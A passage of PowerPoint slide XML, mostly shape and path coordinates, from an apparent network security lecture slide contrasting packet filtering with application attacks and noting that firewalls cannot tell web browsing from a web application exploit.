                  <a:lnTo>
                    <a:pt x="415070" y="37221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411401" y="32558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406708" y="28880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400977" y="26253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394601" y="24768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395563" y="24768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386408" y="24152"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="418514" y="73066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416075" y="73066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413576" y="74968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410162" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401506" y="80064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397035" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="73066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="415345" y="37807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="389171" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392524" y="38959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396812" y="43571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397850" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397929" y="47012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398051" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419429" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419268" y="49312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417879" y="43571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417805" y="43269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417693" y="42805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415345" y="37807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="459601" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="437696" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437696" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="48792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462344" y="47820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464904" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469659" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487094" y="46323"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480147" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482725" y="46526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484229" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485258" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="46323"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487094" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477770" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475674" y="26712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468582" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464396" y="32164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="590422" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546327" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546327" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="64995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590727" y="64995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617503" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619065" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616107" y="15453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="12399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606638" y="8030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603163" y="6543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595258" y="4561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590422" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="619065" y="21187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585159" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587516" y="21724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591784" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593369" y="24700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596132" y="28374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596803" y="30563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596803" y="35689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580262" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617503" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620191" y="40589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620902" y="36634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620902" y="27368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620058" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619947" y="22898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619065" y="21187"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="684850" y="2306"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674162" y="2306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667822" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635939" y="35683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634862" y="42176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634862" y="57023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656706" y="91232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674263" y="96188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685520" y="96188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689077" y="95964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693548" y="95196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693737" y="95196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="88420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681802" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679130" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678963" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672739" y="76337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659084" y="55050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659084" y="43988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681355" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="9830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688284" y="2517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684850" y="2306"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712973" y="66815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710535" y="66815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709458" y="67781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708056" y="68929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704662" y="71585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702813" y="72832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700822" y="74001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699609" y="74752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698294" y="75535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695924" y="76597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690377" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687573" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="66815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712973" y="19783"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687573" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690804" y="20297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690565" y="20297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710357" y="31794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="31794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="197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2" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B404E027-D337-234C-4008-5129C791CCA7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69311" y="3392450"/>
              <a:ext cx="603854" cy="252007"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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58B44F0C-2601-012B-96F9-EF68FC044F30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3236480" y="2418079"/>
              <a:ext cx="3568700" cy="1398905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="942860" y="991120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1016" y="913396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="925550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941844" y="1003274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942860" y="991120"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="1600758" y="998715"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1600682" y="986523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355318" y="988047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355394" y="1000239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600758" y="998715"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="3149422" y="10172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3142716" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2226780" y="601967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233485" y="612152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149422" y="10172"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="3568217" y="1388173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2876321" y="987361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2870225" y="997902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3562121" y="1398714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568217" y="1388173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4" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA6E7EF-D642-AAA1-C86E-7A22DE8457DC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92036" y="3604244"/>
              <a:ext cx="527308" cy="990595"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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8E3271E0-DB3F-2121-4100-B9F446B907ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3289172" y="2493137"/>
              <a:ext cx="3171190" cy="980440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3171190" h="980439">
                  <a:moveTo>
                    <a:pt x="3134994" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121665" y="771017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103886" y="701294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="876554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175260" y="980313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157352" y="910589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170681" y="139573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134994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99C0B638-8229-79A0-CA48-99FD9E8309E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3289172" y="2493137"/>
              <a:ext cx="3171190" cy="980440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3171190" h="980439">
                  <a:moveTo>
                    <a:pt x="0" y="876554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103886" y="701294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121665" y="771017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134994" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170681" y="139573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157352" y="910589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175260" y="980313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="876554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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4AC11BD-9BAC-8A68-CF46-A3B6CB1E2BD2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8" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE7AA61-50A2-9CE9-8299-2931DE1CD222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100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1914305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F1C002-043A-470E-454E-93167C7F23EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514324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Packet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Filtering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vs.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Application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Attacks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FEC6D44-A728-AAAA-B6EB-03149CABB2EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513715" y="1158864"/>
            <a:ext cx="81165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same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way,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application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exploits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go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through,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because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firewall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cannot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see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difference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between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web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browsing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a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web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application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exploit.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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5983E7F6-DA0D-1540-10A4-6AFD7DDC97D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1082980" y="2059242"/>
            <a:ext cx="7166768" cy="2733631"/>
            <a:chOff x="979932" y="2058364"/>
            <a:chExt cx="7166768" cy="2733631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A64FBA70-E474-54D9-4041-91A543BE944E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1004058" y="2294881"/>
              <a:ext cx="3385820" cy="2176145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3385820" h="2176145">
                  <a:moveTo>
                    <a:pt x="1419445" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1314897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258602" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202306" y="24130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178180" y="32173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150032" y="40217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073631" y="76412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025378" y="108586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965062" y="156847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924851" y="197064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908767" y="221194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892682" y="241303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876598" y="265433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864534" y="285542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852471" y="309672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836387" y="333803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828345" y="361955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812260" y="410215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804218" y="438367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800197" y="462498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792155" y="518802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792155" y="591193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768028" y="595215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739881" y="599236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715754" y="607280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687606" y="615323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667501" y="627389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643374" y="643475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623269" y="655541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570995" y="715866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534805" y="784236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="832496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522742" y="864670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="880757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="904888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498615" y="896844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466446" y="888801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434278" y="884779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406130" y="884779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361898" y="888801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321687" y="892822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281476" y="904888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245286" y="916953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209096" y="933040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144759" y="973257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88464" y="1025539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28147" y="1118039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="1154234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1226626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1307060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="1379451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28147" y="1415647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68358" y="1479994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116611" y="1536298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176928" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209096" y="1604668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245286" y="1616733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281476" y="1632820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321687" y="1640863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361898" y="1644885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406130" y="1648907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430256" y="1648907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458404" y="1644885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458404" y="1681080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462425" y="1705211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462425" y="1729341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470467" y="1753471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474488" y="1773580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490573" y="1821841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502636" y="1841949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514699" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575016" y="1946514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631311" y="1998797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671522" y="2030970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715754" y="2059123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764007" y="2083253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816281" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868556" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924851" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957020" y="2135535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985167" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1013315" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045484" y="2143579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077652" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109821" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174159" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1206327" y="2123470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262623" y="2107383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294791" y="2099340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318918" y="2087275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347066" y="2071188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1371192" y="2059123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395319" y="2043036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423466" y="2026949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443572" y="2010862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467698" y="1994775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1487804" y="1974666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503888" y="1994775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523994" y="2018905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544099" y="2034992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568226" y="2055101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592352" y="2071188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616479" y="2091296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644627" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676795" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1708964" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741133" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777323" y="2151622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849702" y="2167709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885892" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1922082" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962293" y="2175753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014567" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062820" y="2167709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111073" y="2159666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159326" y="2147600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199537" y="2135535"/>
                  </a:lnTo>
                  <a:lnTo>
